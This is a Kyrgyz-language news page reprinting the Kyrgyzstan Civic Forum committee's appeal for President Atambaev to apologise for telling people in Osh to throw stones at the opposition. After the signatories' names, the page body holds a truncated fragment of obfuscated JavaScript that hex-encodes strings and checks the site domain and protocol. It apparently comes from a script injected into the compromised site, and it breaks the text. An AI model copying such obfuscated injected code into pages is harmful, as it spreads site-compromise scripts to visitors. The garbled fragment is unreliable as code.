Menu

Кыргызстан Жарандык форумунун кайрылуусу: Атамбаев кечээ айткан сөздөрү үчүн кечирим сурасын!

Бөлүшүү:

Кыргызстан Жарандык Форумунун башкаруу комитетинин Кайрылуусу
Кыргыз Республикасынын  Президенти Алмазбек  Атамбаев өлкөнүн Ош  жана Жалал-Абад облусун кыдыруу маалында Оштогу жарандардын алдында чыгып сүйлөп оппозициянын наамына катуу сын пикирлерди айтып келип ,«Оппозицияны жолотпогула, аларга таш ургула» деген ачуу сөздөрүн эмоцияга берилип айтканы эл арасында катуу талкуу, түрдүү жоромолдорду  жаратууда.
Жарандык Форумдун катышуучуларынын башкаруу комитетинин позициясы боюнча Президенттин оппозициянын наамына мындай сөздөрдү айтышы алардын аброюна жана кадыр-баркына катуу шек келтире турган көрүнүш болуп саналат.
Мындан тышкары «Таш менен ургула» же «Таш баранга алгыла» деген сөздөр  элди башка адамдарга күч колдонууга үндөп, зордук-зомбулук көрсөтүүгө чакырык катары эсептелет. Мындай чакырыкты өлкөнүн жөнөкөй жараны жасаса да мыйзам алдында жол бериши керек. Эч бир адам мындай чакырыктар менен чыкпашы керек.
Ал эми жалпы эл тарабынан шайланган Президент мындай сөздөрдү айтуусуна мыйзам да, анын Президенттик ыйгарым укугу да жол бербеши керек эле.  Өлкөнүн Президенти, тескерисинче элди ынтымакка, биримдикке үндөп өлкөнүн ар бир жаранына сыйлоо жана урматтоо менен мамиле жасоосу керек эле.
Президент мындай туура эмес айткан сөзү жана элди оппозицияга каршы күч колдонуга жасаган чакырыгы үчүн эл алдында кечирим сурап, ал ачуу сөздү эмнеге айтканын түшүндүрүп коюшу керек.
Жакында өткөн жарандык Форум 30-март, 2016-жылы бийлик менен оппозицияны сүйлөшүүгө чакырып, элдин кызыкчылыгы үчүн биргелешип аракет кылууга аракет кылып жатабыз.
Мына ушундай оор мезгилде ортодогу жараканы ого бетер тереңдетпей өз ара жакындашуга барып, бири-бирин душман тутпай айтылган туура эмес сөздөр, кетирилген кемчиликтер боюнча өз ара кечиришип коюшса жакшы болор эле.
Жарандык Форум ортомчу, калыс пикирде болуп элдин ынтымагы үчүн данакерлик миссияны аткаралы деген изги тилектерибиз бар.
Биз  мамлекет башчысынын жасап жаткан жакшы иштерин да белгилеп, ага чоң маани берип келебиз.
Ал эми кетирилип жаткан кемчиликтер боюнча да айтпай коё албайбыз. Бул биздин жарандык позициябыз
  Жарандын  Форумдун башкаруу комитетинин төрагасы Турсунбек Акун                       
Комитеттин мүчөлөрү:                                                                             Эркин Асаналиев
Кубаныч Маматкеримов
Жумабаева Бактыгуль
Назалов Кылычбек
Тыналиева  Гулумкан
Касымалиева  Ажар
Молдобеков  Эсенгелди
 
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha + 11 = 15

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: